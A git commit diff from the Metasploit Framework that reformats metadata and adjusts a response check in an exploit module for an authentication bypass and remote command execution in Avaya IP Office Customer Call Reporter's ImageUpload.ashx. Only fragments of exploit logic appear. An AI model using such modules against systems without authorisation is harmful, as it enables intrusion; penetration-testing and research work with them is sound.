metadata formatting, and a little res gotcha
parent
cdf8956a10
commit
abb4bdd408
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
|
'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits an authentication bypass vulnerability on Avaya IP Office
|
This module exploits an authentication bypass vulnerability on Avaya IP Office
|
||||||
Customer Call Reporter, which allows a remote user to upload arbitrary files
|
Customer Call Reporter, which allows a remote user to upload arbitrary files
|
||||||
|
@ -24,10 +24,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP
|
arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP
|
||||||
Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.
|
Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.
|
||||||
},
|
},
|
||||||
'Author' => [
|
'Author' =>
|
||||||
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
|
[
|
||||||
'juan vazquez' # Metasploit module
|
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
|
||||||
],
|
'juan vazquez' # Metasploit module
|
||||||
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
@ -173,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'method' => 'GET'
|
'method' => 'GET'
|
||||||
}, 20)
|
}, 20)
|
||||||
|
|
||||||
if (!res or res.code != 200)
|
if (!res or (res and res.code != 200))
|
||||||
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
|
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue